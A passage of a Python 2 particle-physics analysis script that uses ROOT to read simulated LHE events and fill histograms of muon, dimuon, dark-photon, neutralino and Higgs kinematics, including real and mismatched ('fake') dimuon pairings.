h_m1_vs_m2 = ROOT.TH2F("h_m1_vs_m2", "h_m1_vs_m2", m_bins, m_min, m_max, m_bins, m_min, m_max)
h_m1_vs_m2.SetYTitle("m_{1#mu#mu} [GeV]")
h_m1_vs_m2.SetTitleOffset(1.3, "Y")
h_m1_vs_m2.SetXTitle("m_{2#mu#mu} [GeV]")
h_m1 = ROOT.TH1F("h_m1", "h_m1", 101, 0.1, 10.1)
h_m1.SetLineColor(ROOT.kRed)
h_m1.SetLineWidth(2)
h_m1.SetLineStyle(1)
h_m2 = ROOT.TH1F("h_m2", "h_m2", 101, 0.1, 10.1)
h_m2.SetYTitle("Events / 0.1 GeV")
h_m2.SetXTitle("m_{#mu#mu} [GeV]")
h_m2.SetTitleOffset(1.35, "Y")
h_m2.SetLineColor(ROOT.kBlue)
h_m2.SetLineWidth(2)
h_m2.SetLineStyle(1)
h_m2.SetMaximum(110000)
h_dimuon_1_pT_dummy = ROOT.TH1F("h_dimuon_1_pT_dummy", "h_dimuon_1_pT_dummy", 100, 0, 100)
h_dimuon_1_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
h_dimuon_1_pT_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_1_pT_dummy.SetXTitle("p_{T} of #mu#mu [GeV]")
h_dimuon_1_pT_dummy.SetMaximum( 0.1 )
h_dimuon_1_pZ_dummy = ROOT.TH1F("h_dimuon_1_pZ_dummy", "h_dimuon_1_pZ_dummy", 100, 0, 100)
h_dimuon_1_pZ_dummy.SetYTitle("Fraction of events / 1 GeV")
h_dimuon_1_pZ_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_1_pZ_dummy.SetXTitle("|p_{Z}| of #mu#mu [GeV]")
h_dimuon_1_pZ_dummy.SetMaximum( 0.1 )
h_dimuon_1_Eta_dummy = ROOT.TH1F("h_dimuon_1_Eta_dummy", "h_dimuon_1_Eta_dummy",100,-5,5)
h_dimuon_1_Eta_dummy.SetYTitle("Fraction of events / 0.1")
h_dimuon_1_Eta_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_1_Eta_dummy.SetXTitle("#eta of #mu#mu")
h_dimuon_1_Eta_dummy.SetMaximum( 0.1 )
h_dimuon_1_Phi_dummy = ROOT.TH1F("h_dimuon_1_Phi_dummy", "h_dimuon_1_Phi_dummy",80,-4,4 )
h_dimuon_1_Phi_dummy.SetYTitle("Fraction of events / 0.1 rad")
h_dimuon_1_Phi_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_1_Phi_dummy.SetXTitle("#phi of #mu#mu [rad]")
h_dimuon_1_Phi_dummy.SetMaximum( 0.05 )
h_dimuon_1_p_dummy = ROOT.TH1F("h_dimuon_1_p_dummy", "h_dimuon_1_p_dummy", 100, 0, 100)
h_dimuon_1_p_dummy.SetYTitle("Fraction of events / 1 GeV")
h_dimuon_1_p_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_1_p_dummy.SetXTitle("p of #mu#mu [GeV]")
h_dimuon_1_p_dummy.SetMaximum( 0.1 )
h_dimuon_1_M_dummy = ROOT.TH1F("h_dimuon_1_M_dummy", "h_dimuon_1_M_dummy", 50, 0.5, 10.005)
h_dimuon_1_M_dummy.SetYTitle("Fraction of events / 0.2 GeV")
h_dimuon_1_M_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_1_M_dummy.SetXTitle("Mass of #mu#mu [GeV]")
h_dimuon_1_M_dummy.SetMaximum( 1.4 )
h_dimuon_1_p = ROOT.TH1F("h_dimuon_1_p", "h_dimuon_1_p", 100, 0, 100)
h_dimuon_1_p.SetLineColor(ROOT.kBlue)
h_dimuon_1_p.SetLineWidth(2)
h_dimuon_1_p.SetLineStyle(1)
h_dimuon_1_M = ROOT.TH1F("h_dimuon_1_M", "h_dimuon_1_M", 500, 0.005, 10.005)
h_dimuon_1_M.SetLineColor(ROOT.kBlue)
h_dimuon_1_M.SetLineWidth(2)
h_dimuon_1_M.SetLineStyle(1)
h_dimuon_1_pT = ROOT.TH1F("h_dimuon_1_pT", "h_dimuon_1_pT", 100, 0, 100)
h_dimuon_1_pT.SetLineColor(ROOT.kBlue)
h_dimuon_1_pT.SetLineWidth(2)
h_dimuon_1_pT.SetLineStyle(1)
h_dimuon_1_pZ = ROOT.TH1F("h_dimuon_1_pZ", "h_dimuon_1_pZ", 100, 0, 100)
h_dimuon_1_pZ.SetLineColor(ROOT.kBlue)
h_dimuon_1_pZ.SetLineWidth(2)
h_dimuon_1_pZ.SetLineStyle(1)
h_dimuon_1_Eta = ROOT.TH1F("h_dimuon_1_Eta", "h_dimuon_1_Eta",100,-5,5)
h_dimuon_1_Eta.SetLineColor(ROOT.kBlue)
h_dimuon_1_Eta.SetLineWidth(2)
h_dimuon_1_Eta.SetLineStyle(1)
h_dimuon_1_Phi = ROOT.TH1F("h_dimuon_1_Phi", "h_dimuon_1_Phi", 80,-4,4)
h_dimuon_1_Phi.SetLineColor(ROOT.kBlue)
h_dimuon_1_Phi.SetLineWidth(2)
h_dimuon_1_Phi.SetLineStyle(1)
h_dimuon_2_p = ROOT.TH1F("h_dimuon_2_p", "h_dimuon_2_p", 100, 0, 100)
h_dimuon_2_p.SetLineColor(ROOT.kRed)
h_dimuon_2_p.SetLineWidth(2)
h_dimuon_2_p.SetLineStyle(1)
h_dimuon_2_pT = ROOT.TH1F("h_dimuon_2_pT", "h_dimuon_2_pT", 100, 0, 100)
h_dimuon_2_pT.SetLineColor(ROOT.kRed)
h_dimuon_2_pT.SetLineWidth(2)
h_dimuon_2_pT.SetLineStyle(1)
h_dimuon_2_pZ = ROOT.TH1F("h_dimuon_2_pZ", "h_dimuon_2_pZ", 100, 0, 100)
h_dimuon_2_pZ.SetLineColor(ROOT.kRed)
h_dimuon_2_pZ.SetLineWidth(2)
h_dimuon_2_pZ.SetLineStyle(1)
h_dimuon_2_Eta = ROOT.TH1F("h_dimuon_2_Eta", "h_dimuon_2_Eta", 100,-5,5)
h_dimuon_2_Eta.SetLineColor(ROOT.kRed)
h_dimuon_2_Eta.SetLineWidth(2)
h_dimuon_2_Eta.SetLineStyle(1)
h_dimuon_2_Phi = ROOT.TH1F("h_dimuon_2_Phi", "h_dimuon_2_Phi", 80,-4,4)
h_dimuon_2_Phi.SetLineColor(ROOT.kRed)
h_dimuon_2_Phi.SetLineWidth(2)
h_dimuon_2_Phi.SetLineStyle(1)
################################################################################
# BAM Functions
################################################################################
def plotOverflow(hist):
name = hist.GetName()
title = hist.GetTitle()
nx = hist.GetNbinsX()+1
x1 = hist.GetBinLowEdge(1)
bw = hist.GetBinWidth(nx)
x2 = hist.GetBinLowEdge(nx)+bw
htmp = ROOT.TH1F(name, title, nx, x1, x2)
for i in range(1, nx):
htmp.Fill(htmp.GetBinCenter(i), hist.GetBinContent(i))
htmp.Fill(hist.GetNbinsX()-1, hist.GetBinContent(0))
htmp.SetEntries(hist.GetEntries())
htmp.SetLineColor(hist.GetLineColor())
htmp.SetLineWidth(hist.GetLineWidth())
htmp.SetLineStyle(hist.GetLineStyle())
htmp.DrawNormalized("same")
return
def integral(hist):
eachBinWidth = hist.GetBinWidth(hist.GetNbinsX()+1)
#print "Begin Integral"
#print eachBinWidth
runningSum = 0
for i in range(0, hist.GetNbinsX()+1):
area = eachBinWidth * hist.GetBinContent(i)
runningSum = runningSum + area
#print i
#print area
return runningSum
def getEta(pz, p):
output = atanh(pz/p)
return output
def scaleAxisY(hist, dummy):
normFactor = hist.Integral()
max = hist.GetBinContent(hist.GetMaximumBin()) / normFactor
scale = 1.8
newMax = scale*max
dummy.SetMaximum(newMax)
def scaleAxisYcT(hist, dummy):
normFactor = integral(hist)
max = hist.GetBinContent(hist.GetMaximumBin()) / normFactor
scale = 1.8
newMax = scale*max
dummy.SetMaximum(newMax)
################################################################################
# Loop over events
################################################################################
nEvents = 0
isEvent = False
nEventsOK = 0
for line in f:
if line == '<event>\n':
isEvent = True
isEvent = True
nEvents = nEvents + 1
nLinesInEvent = 0
nParticlesInEvent = 0
muons = []
dimuons = []
DimuonIndex1 = []
DimuonIndex2 = []
bamDimuons = []
FakeIndex1 = []
FakeIndex2 = []
FakeDimuons = []
lifetimes = []
higgs = []
neutralinos = []
darkNeutralinos = []
gammaDs = []
n1PlotCounter = 0
gammaDPlotCounter = 0
nDPlotCounter = 0
if nEvents > nExit: break
continue
if line == '</event>\n':
isEvent = False
continue
if isEvent == True:
nLinesInEvent = nLinesInEvent + 1
#***************************************************************************
# first line with common event information
#***************************************************************************
if nLinesInEvent == 1:
word_n = 0
# print "I", line
for word in line.split():
word_n = word_n + 1
if word_n == 1: NUP = int(word) # number of particles in the event
if word_n == 2: IDPRUP = int(word) # process type
if word_n == 3: XWGTUP = float(word) # event weight
if word_n == 4: SCALUP = float(word) # factorization scale Q
if word_n == 5: AQEDUP = float(word) # the QED coupling alpha_em
if word_n == 6: AQCDUP = float(word) # the QCD coupling alpha_s
if word_n > 6: print "Warning! Wrong common event information", line
#***************************************************************************
# line with particle information
#***************************************************************************
if nLinesInEvent >= 2:
nParticlesInEvent = nParticlesInEvent + 1
word_n = 0
# print "P", line
for word in line.split():
word_n = word_n + 1
if word_n == 1: IDUP = int(word) # particle PDG identity code
if word_n == 2: ISTUP = int(word) # status code
if word_n == 3: MOTHUP1 = int(word) # position of the first mother of particle
if word_n == 4: MOTHUP2 = int(word) # position of the last mother of particle
if word_n == 5: ICOLUP1 = int(word) # tag for the colour flow info
if word_n == 6: ICOLUP2 = int(word) # tag for the colour flow info
if word_n == 7: PUP1 = float(word) # px in GeV
if word_n == 8: PUP2 = float(word) # py in GeV
if word_n == 9: PUP3 = float(word) # pz in GeV
if word_n == 10: PUP4 = float(word) # E in GeV
if word_n == 11: PUP5 = float(word) # m in GeV
if word_n == 12: VTIMUP = float(word) # invariant lifetime ctau in mm
if word_n == 13: SPINUP = float(word) # cosine of the angle between the spin vector of a particle and its three-momentum
if word_n > 13: print "Warning! Wrong particle line", line
if abs(IDUP) == muonID:
if IDUP > 0: q = -1
if IDUP < 0: q = 1
v4 = ROOT.TLorentzVector(PUP1, PUP2, PUP3, PUP4)
muons.append(( q, v4.Px(), v4.Py(), v4.Pz(), v4.E(), v4.M(), v4.Pt(), v4.Eta(), v4.Phi(), MOTHUP1 ))
if abs(IDUP) == higgsID:
if IDUP > 0: q = 0
if IDUP < 0: q = 0
vHiggs = ROOT.TLorentzVector(PUP1, PUP2, PUP3, PUP4)
higgs.append((q, vHiggs.Px(), vHiggs.Py(), vHiggs.Pz(), vHiggs.E(), vHiggs.M(), vHiggs.Pt(), vHiggs.Eta(), vHiggs.Phi() ))
h_higgs_pT.Fill( higgs[len(higgs)-1][6] )
h_higgs_M.Fill( higgs[len(higgs)-1][5] )
h_higgs_p.Fill( sqrt( higgs[len(higgs)-1][1]*higgs[len(higgs)-1][1] + higgs[len(higgs)-1][2]*higgs[len(higgs)-1][2] + higgs[len(higgs)-1][3]*higgs[len(higgs)-1][3] ) )
h_higgs_pZ.Fill( fabs(higgs[len(higgs)-1][3]) )
#h_higgs_Eta.Fill( higgs[len(higgs)-1][7] )
h_higgs_Phi.Fill( higgs[len(higgs)-1][8] )
if abs(IDUP) == n1ID:
q = 0
vNeutralino = ROOT.TLorentzVector(PUP1, PUP2, PUP3, PUP4)
neutralinos.append((q, vNeutralino.Px(), vNeutralino.Py(), vNeutralino.Pz(), vNeutralino.E(), vNeutralino.M(), vNeutralino.Pt(), vNeutralino.Eta(), vNeutralino.Phi() ))
if len(neutralinos) == 2 and n1PlotCounter == 0:
neutralinos_sorted_pT = sorted(neutralinos, key=itemgetter(6), reverse=True)
neutralinos = neutralinos_sorted_pT
h_n1_1_pT.Fill( neutralinos[0][6] )
h_n1_2_pT.Fill( neutralinos[1][6] )
h_n1_1_p.Fill( sqrt( neutralinos[0][1]*neutralinos[0][1] + neutralinos[0][2]*neutralinos[0][2] + neutralinos[0][3]*neutralinos[0][3] ) )
h_n1_2_p.Fill( sqrt( neutralinos[1][1]*neutralinos[1][1] + neutralinos[1][2]*neutralinos[1][2] + neutralinos[1][3]*neutralinos[1][3] ) )
h_n1_1_M.Fill( neutralinos[0][5] )
h_n1_1_M.Fill( neutralinos[1][5] )
h_n1_1_pZ.Fill( fabs(neutralinos[0][3]) )
h_n1_2_pZ.Fill( fabs(neutralinos[1][3]) )
h_n1_1_Eta.Fill( getEta(neutralinos[0][3],(sqrt( neutralinos[0][1]*neutralinos[0][1] + neutralinos[0][2]*neutralinos[0][2] + neutralinos[0][3]*neutralinos[0][3] ))) )
h_n1_1_Phi.Fill( neutralinos[0][8] )
h_n1_2_Eta.Fill( getEta(neutralinos[1][3], sqrt( neutralinos[1][1]*neutralinos[1][1] + neutralinos[1][2]*neutralinos[1][2] + neutralinos[1][3]*neutralinos[1][3] )) )
#print "PUP3, PZ, P, ETA:"
#print neutralinos[0][7]
#print neutralinos[0][3]
#print (sqrt( neutralinos[0][1]*neutralinos[0][1] + neutralinos[0][2]*neutralinos[0][2] + neutralinos[0][3]*neutralinos[0][3] ))
#print getEta(neutralinos[0][3],(sqrt( neutralinos[0][1]*neutralinos[0][1] + neutralinos[0][2]*neutralinos[0][2] + neutralinos[0][3]*neutralinos[0][3] )))
h_n1_2_Phi.Fill( neutralinos[1][8] )
n1PlotCounter = 1
if abs(IDUP) == nDID:
q = 0
vDarkNeutralino = ROOT.TLorentzVector(PUP1, PUP2, PUP3, PUP4)
darkNeutralinos.append((q, vDarkNeutralino.Px(), vDarkNeutralino.Py(), vDarkNeutralino.Pz(), vDarkNeutralino.E(), vDarkNeutralino.M(), vDarkNeutralino.Pt(), vDarkNeutralino.Eta(), vDarkNeutralino.Phi() ))
if len(darkNeutralinos) == 2 and nDPlotCounter == 0:
darkNeutralinos_sorted_pT = sorted(darkNeutralinos, key=itemgetter(6), reverse=True)
darkNeutralinos = darkNeutralinos_sorted_pT
h_nD_1_pT.Fill( darkNeutralinos[0][6] )
h_nD_2_pT.Fill( darkNeutralinos[1][6] )
h_nD_1_p.Fill( sqrt( darkNeutralinos[0][1]*darkNeutralinos[0][1] + darkNeutralinos[0][2]*darkNeutralinos[0][2] + darkNeutralinos[0][3]*darkNeutralinos[0][3] ) )
h_nD_2_p.Fill( sqrt( darkNeutralinos[1][1]*darkNeutralinos[1][1] + darkNeutralinos[1][2]*darkNeutralinos[1][2] + darkNeutralinos[1][3]*darkNeutralinos[1][3] ) )
h_nD_1_M.Fill( darkNeutralinos[0][5] )
h_nD_1_M.Fill( darkNeutralinos[1][5] )
h_nD_1_pZ.Fill( fabs(darkNeutralinos[0][3]) )
h_nD_2_pZ.Fill( fabs(darkNeutralinos[1][3]) )
h_nD_1_Eta.Fill( getEta(darkNeutralinos[0][3], sqrt( darkNeutralinos[0][1]*darkNeutralinos[0][1] + darkNeutralinos[0][2]*darkNeutralinos[0][2] + darkNeutralinos[0][3]*darkNeutralinos[0][3] )) )
h_nD_1_Phi.Fill( darkNeutralinos[0][8] )
h_nD_2_Eta.Fill( getEta(darkNeutralinos[1][3], sqrt( darkNeutralinos[1][1]*darkNeutralinos[1][1] + darkNeutralinos[1][2]*darkNeutralinos[1
][2] + darkNeutralinos[1][3]*darkNeutralinos[1][3] )) )
h_nD_2_Phi.Fill( darkNeutralinos[1][8] )
vectorSum =( ( darkNeutralinos[0][1] + darkNeutralinos[1][1] )*( darkNeutralinos[0][1] + darkNeutralinos[1][1] ) ) + ( (darkNeutralinos[0][2] + darkNeutralinos[1][2])*(darkNeutralinos[0][2] + darkNeutralinos[1][2]) )
Etmiss.Fill(vectorSum)
nDPlotCounter = 1
if abs(IDUP) == gammaDID:
q = 0
vgammaDs = ROOT.TLorentzVector(PUP1, PUP2, PUP3, PUP4)
gammaDs.append(( q, vgammaDs.Px(), vgammaDs.Py(), vgammaDs.Pz(), vgammaDs.E(), vgammaDs.M(), vgammaDs.Pt(), vgammaDs.Eta(), vgammaDs.Phi()))
h_gammaD_cT.Fill( VTIMUP )
pmom = sqrt( vgammaDs.Px()*vgammaDs.Px() + vgammaDs.Py()*vgammaDs.Py() + vgammaDs.Pz()*vgammaDs.Pz() )
beta = pmom/(sqrt(vgammaDs.M()*vgammaDs.M() + pmom*pmom ))
lorentz = 1/sqrt( 1 - beta*beta )
h_gammaD_cT_lab.Fill( lorentz*VTIMUP )
pmomxy = sqrt( vgammaDs.Px()*vgammaDs.Px() + vgammaDs.Py()*vgammaDs.Py() )
betaxy = pmomxy/sqrt( vgammaDs.M()*vgammaDs.M() + pmomxy*pmomxy )
lorentzxy = 1/sqrt(1- betaxy*betaxy)
h_gammaD_cT_XY_lab.Fill( lorentzxy*VTIMUP )
pmomz = sqrt( vgammaDs.Pz()*vgammaDs.Pz() )
betaz = pmomz/sqrt( vgammaDs.M()*vgammaDs.M() + pmomz*pmomz )
lorentzZ = 1/sqrt(1 - betaz*betaz )
h_gammaD_cT_Z_lab.Fill( lorentzZ * VTIMUP )
lifetimes.append( (VTIMUP, vgammaDs.Px(), vgammaDs.Py(), vgammaDs.Pz(), vgammaDs.Pt(), vgammaDs.M() ))
if len(gammaDs) == 2 and gammaDPlotCounter == 0:
gammaDs_sorted_pT = sorted(gammaDs, key=itemgetter(6), reverse=True)
gammaDs = gammaDs_sorted_pT
lifetimes_sorted_pT = sorted(lifetimes, key=itemgetter(4), reverse=True)
lifetimes = lifetimes_sorted_pT
h_gammaD_1_cT.Fill( lifetimes[0][0] )
pmom = sqrt( lifetimes[0][1]*lifetimes[0][1] + lifetimes[0][2]*lifetimes[0][2] + lifetimes[0][3]*lifetimes[0][3] )
beta = pmom/(sqrt(lifetimes[0][5]*lifetimes[0][5] + pmom*pmom ))
lorentz = 1/sqrt( 1 - beta*beta )
h_gammaD_1_cT_lab.Fill( lorentz*lifetimes[0][0] )
#print "pmom, beta, lorentz"
#print pmom
#print beta
#print lorentz
#print lorentz*lifetimes[0][0]
pmomxy = sqrt( lifetimes[0][1]*lifetimes[0][1] + lifetimes[0][2]*lifetimes[0][2] )
betaxy = pmomxy/sqrt( lifetimes[0][5]*lifetimes[0][5] + pmomxy*pmomxy )
lorentzxy = 1/sqrt(1- betaxy*betaxy)
h_gammaD_1_cT_XY_lab.Fill( lorentzxy*lifetimes[0][0] )
pmomz = sqrt( lifetimes[0][3]*lifetimes[0][3] )
betaz = pmomz/sqrt( lifetimes[0][5]*lifetimes[0][5] + pmomz*pmomz )
lorentzZ = 1/sqrt(1 - betaz*betaz )
h_gammaD_1_cT_Z_lab.Fill( lorentzZ * lifetimes[0][0] )
h_gammaD_2_cT.Fill( lifetimes[1][0] )
pmom = sqrt( lifetimes[1][1]*lifetimes[1][1] + lifetimes[1][2]*lifetimes[1][2] + lifetimes[1][3]*lifetimes[1][3] )
beta = pmom/(sqrt(lifetimes[1][5]*lifetimes[1][5] + pmom*pmom ))
lorentz = 1/sqrt( 1 - beta*beta )
h_gammaD_2_cT_lab.Fill( lorentz*lifetimes[1][0] )
pmomxy = sqrt( lifetimes[1][1]*lifetimes[1][1] + lifetimes[1][2]*lifetimes[1][2] )
betaxy = pmomxy/sqrt( lifetimes[1][5]*lifetimes[1][5] + pmomxy*pmomxy )
lorentzxy = 1/sqrt(1- betaxy*betaxy)
h_gammaD_2_cT_XY_lab.Fill( lorentzxy*lifetimes[1][0] )
pmomz = sqrt( lifetimes[1][3]*lifetimes[1][3] )
betaz = pmomz/sqrt( lifetimes[1][5]*lifetimes[1][5] + pmomz*pmomz )
lorentzZ = 1/sqrt(1 - betaz*betaz )
h_gammaD_2_cT_Z_lab.Fill( lorentzZ * lifetimes[1][0] )
h_gammaD_1_pT.Fill( gammaDs[0][6] )
h_gammaD_2_pT.Fill( gammaDs[1][6] )
h_gammaD_1_p.Fill( sqrt( gammaDs[0][1]*gammaDs[0][1] + gammaDs[0][2]*gammaDs[0][2] + gammaDs[0][3]*gammaDs[0][3] ) )
h_gammaD_2_p.Fill( sqrt( gammaDs[1][1]*gammaDs[1][1] + gammaDs[1][2]*gammaDs[1][2] + gammaDs[1][3]*gammaDs[1][3] ) )
h_gammaD_1_M.Fill( gammaDs[0][5] )
h_gammaD_1_M.Fill( gammaDs[1][5] )
h_gammaD_1_pZ.Fill( fabs(gammaDs[0][3]) )
h_gammaD_2_pZ.Fill( fabs(gammaDs[1][3]) )
h_gammaD_1_Eta.Fill( getEta(gammaDs[0][3], sqrt( gammaDs[0][1]*gammaDs[0][1] + gammaDs[0][2]*gammaDs[0][2] + gammaDs[0][3]*gammaDs[0][3] ) ) )
h_gammaD_1_Phi.Fill( gammaDs[0][8] )
h_gammaD_2_Eta.Fill( getEta(gammaDs[1][3], sqrt( gammaDs[1][1]*gammaDs[1][1] + gammaDs[1][2]*gammaDs[1][2] + gammaDs[1][3]*gammaDs[1][3] ) ) )
h_gammaD_2_Phi.Fill( gammaDs[1][8] )
gammaDPlotCounter = 1
if len(muons) == 4:
muons_sorted_pT = sorted(muons, key=itemgetter(6), reverse=True)
muons = muons_sorted_pT
h_muon_pT_0.Fill( muons[0][6] )
h_muon_pT_1.Fill( muons[1][6] )
h_muon_pT_2.Fill( muons[2][6] )
h_muon_pT_3.Fill( muons[3][6] )
h_muon_eta_0.Fill( muons[0][7] )
h_muon_eta_1.Fill( muons[1][7] )
h_muon_eta_2.Fill( muons[2][7] )
h_muon_eta_3.Fill( muons[3][7] )
h_muon_phi_0.Fill( muons[0][8] )
h_muon_phi_1.Fill( muons[1][8] )
h_muon_phi_2.Fill( muons[2][8] )
h_muon_phi_3.Fill( muons[3][8] )
h_muon_p_0.Fill( sqrt( muons[0][1]*muons[0][1] + muons[0][2]*muons[0][2] + muons[0][3]*muons[0][3] ) )
h_muon_p_1.Fill( sqrt( muons[1][1]*muons[1][1] + muons[1][2]*muons[1][2] + muons[1][3]*muons[1][3] ) )
h_muon_p_2.Fill( sqrt( muons[2][1]*muons[2][1] + muons[2][2]*muons[2][2] + muons[2][3]*muons[2][3] ) )
h_muon_p_3.Fill( sqrt( muons[3][1]*muons[3][1] + muons[3][2]*muons[3][2] + muons[3][3]*muons[3][3] ) )
h_muon_pZ_0.Fill( muons[0][3] )
h_muon_pZ_1.Fill( muons[1][3] )
h_muon_pZ_2.Fill( muons[2][3] )
h_muon_pZ_3.Fill( muons[3][3] )
parent = muons[1][9] #this is an arbitrary choice to find real dimuons
for i in range(0, len(muons) ):
if parent == muons[i][9]:
DimuonIndex1.append(i)
else:
DimuonIndex2.append(i)
px1 = muons[DimuonIndex1[0]][1] + muons[DimuonIndex1[1]][1]
py1 = muons[DimuonIndex1[0]][2] + muons[DimuonIndex1[1]][2]
pz1 = muons[DimuonIndex1[0]][3] + muons[DimuonIndex1[1]][3]
e1 = muons[DimuonIndex1[0]][4] + muons[DimuonIndex1[1]][4]
px2 = muons[DimuonIndex2[0]][1] + muons[DimuonIndex2[1]][1]
py2 = muons[DimuonIndex2[0]][2] + muons[DimuonIndex2[1]][2]
pz2 = muons[DimuonIndex2[0]][3] + muons[DimuonIndex2[1]][3]
e2 = muons[DimuonIndex2[0]][4] + muons[DimuonIndex2[1]][4]
bamV4_1 = ROOT.TLorentzVector(px1, py1, pz1, e1)
bamV4_2 = ROOT.TLorentzVector(px2, py2, pz2, e2)
bamDimuons.append(( bamV4_1.Px(), bamV4_1.Py(), bamV4_1.Pz(), bamV4_1.E(), bamV4_1.M(), bamV4_1.Pt(), bamV4_1.Eta(), bamV4_1.Phi() ))
bamDimuons.append(( bamV4_2.Px(), bamV4_2.Py(), bamV4_2.Pz(), bamV4_2.E(), bamV4_2.M(), bamV4_2.Pt(), bamV4_2.Eta(), bamV4_2.Phi() ))
bamDimuons_Sorted_M = sorted(bamDimuons, key=itemgetter(4), reverse=True)
bamDimuons = bamDimuons_Sorted_M
h_m1_vs_m2.Fill(bamDimuons[0][4],bamDimuons[1][4])
h_m1.Fill(bamDimuons[0][4])
h_m2.Fill(bamDimuons[1][4])
bamDimuons_Sorted_pT = sorted(bamDimuons, key=itemgetter(5), reverse=True)
bamDimuons = bamDimuons_Sorted_pT
h_dimuon_1_pT.Fill(bamDimuons[0][5])
h_dimuon_2_pT.Fill(bamDimuons[1][5])
h_dimuon_1_pZ.Fill(bamDimuons[0][2])
h_dimuon_2_pZ.Fill(bamDimuons[1][2])
h_dimuon_1_p.Fill(sqrt( bamDimuons[0][0]*bamDimuons[0][0] + bamDimuons[0][1]*bamDimuons[0][1] + bamDimuons[0][2]*bamDimuons[0][2] ))
h_dimuon_2_p.Fill(sqrt( bamDimuons[1][0]*bamDimuons[1][0] + bamDimuons[1][1]*bamDimuons[1][1] + bamDimuons[1][2]*bamDimuons[1][2] ))
h_dimuon_1_Eta.Fill(bamDimuons[0][6])
h_dimuon_2_Eta.Fill(bamDimuons[1][6])
h_dimuon_1_Phi.Fill(bamDimuons[0][7])
h_dimuon_2_Phi.Fill(bamDimuons[1][7])
parent = muons[1][9] #this is an arbitrary choice to find the fake dimuons
charge = muons[1][0]
for i in range(0, len(muons) ):
if parent != muons[i][9] and charge != muons[i][0]:
FakeIndex1.append(i)
FakeIndex1.append(1)
for j in range(0, len(muons) ):
if j != FakeIndex1[0] and j != FakeIndex1[1]:
FakeIndex2.append(j)
Fakepx1 = muons[FakeIndex1[0]][1] + muons[FakeIndex1[1]][1]
Fakepy1 = muons[FakeIndex1[0]][2] + muons[FakeIndex1[1]][2]
Fakepz1 = muons[FakeIndex1[0]][3] + muons[FakeIndex1[1]][3]
Fakee1 = muons[FakeIndex1[0]][4] + muons[FakeIndex1[1]][4]
Fakepx2 = muons[FakeIndex2[0]][1] + muons[FakeIndex2[1]][1]
Fakepy2 = muons[FakeIndex2[0]][2] + muons[FakeIndex2[1]][2]
Fakepz2 = muons[FakeIndex2[0]][3] + muons[FakeIndex2[1]][3]
Fakee2 = muons[FakeIndex2[0]][4] + muons[FakeIndex2[1]][4]
fakeV4_1 = ROOT.TLorentzVector(Fakepx1, Fakepy1, Fakepz1, Fakee1)
fakeV4_2 = ROOT.TLorentzVector(Fakepx2, Fakepy2, Fakepz2, Fakee2)
FakeDimuons.append(( fakeV4_1.Px(), fakeV4_1.Py(), fakeV4_1.Pz(), fakeV4_1.E(), fakeV4_1.M(), fakeV4_1.Pt(), fakeV4_1.Eta(), fakeV4_1.Phi() ))
FakeDimuons.append(( fakeV4_2.Px(), fakeV4_2.Py(), fakeV4_2.Pz(), fakeV4_2.E(), fakeV4_2.M(), fakeV4_2.Pt(), fakeV4_2.Eta(), fakeV4_2.Phi() ))
h_dimuon_m_fake_log_0.Fill(FakeDimuons[0][4])
h_dimuon_m_fake_log_0.Fill(FakeDimuons[1][4])
h_dimuon_m_fake_0.Fill(FakeDimuons[0][4])
h_dimuon_m_fake_0.Fill(FakeDimuons[1][4])
# is1SelMu17 = False
# for i in range(0, len(muons) ):
# if muons[i][6] >= 17. and abs(muons[i][7]) <= 0.9: is1SelMu17 = True
#
# is4SelMu8 = False
# nSelMu8 = 0
# for i in range(0, len(muons) ):
# if muons[i][6] >= 8. and abs(muons[i][7]) <= 2.4: nSelMu8 = nSelMu8 + 1
# if nSelMu8 == 4: is4SelMu8 = True
#
# if is1SelMu17 and is4SelMu8:
# for i in range(0, len(muons) ):
# for j in range(i+1, len(muons) ):
# if muons[i][0] * muons[j][0] < 0:
# px = muons[i][1] + muons[j][1]
# py = muons[i][2] + muons[j][2]
# pz = muons[i][3] + muons[j][3]
# E = muons[i][4] + muons[j][4]
# v4 = ROOT.TLorentzVector(px, py, pz, E)
# dimuons.append(( i, j, v4.Px(), v4.Py(), v4.Pz(), v4.E(), v4.M(), v4.Pt(), v4.Eta(), v4.Phi() ))
# dimuons_sorted_M = sorted(dimuons, key=itemgetter(6), reverse=True)
# dimuons = dimuons_sorted_M
# # print "Dimuons:", dimuons
# h_dimuon_m_0.Fill( dimuons[0][6] )
# h_dimuon_m_1.Fill( dimuons[1][6] )
# h_dimuon_m_2.Fill( dimuons[2][6] )
# h_dimuon_m_3.Fill( dimuons[3][6] )
#
# h_dimuon_m_log_0.Fill( dimuons[0][6] )
# h_dimuon_m_log_1.Fill( dimuons[1][6] )
# h_dimuon_m_log_2.Fill( dimuons[2][6] )
# h_dimuon_m_log_3.Fill( dimuons[3][6] )
#
# #print dimuons[0][6]
# #print float(mass_GammaD_Legend)
# #if dimuons[0][6] > float(mass_GammaD_Legend): print "fake"
# #if dimuons[0][6] <= float(mass_GammaD_Legend): print "real"
# if dimuons[0][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_1.Fill(dimuons[0][6])
# if dimuons[0][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_0.Fill(dimuons[0][6])
# if dimuons[1][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_1.Fill(dimuons[1][6])
# if dimuons[1][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_0.Fill(dimuons[1][6])
# if dimuons[2][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_1.Fill(dimuons[2][6])
# if dimuons[2][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_0.Fill(dimuons[2][6])
# if dimuons[3][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_1.Fill(dimuons[3][6])
# if dimuons[3][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_0.Fill(dimuons[3][6])
#
# if dimuons[0][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_1.Fill(dimuons[0][6])
# if dimuons[0][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_0.Fill(dimuons[0][6])
# if dimuons[1][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_1.Fill(dimuons[1][6])
# if dimuons[1][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_0.Fill(dimuons[1][6])
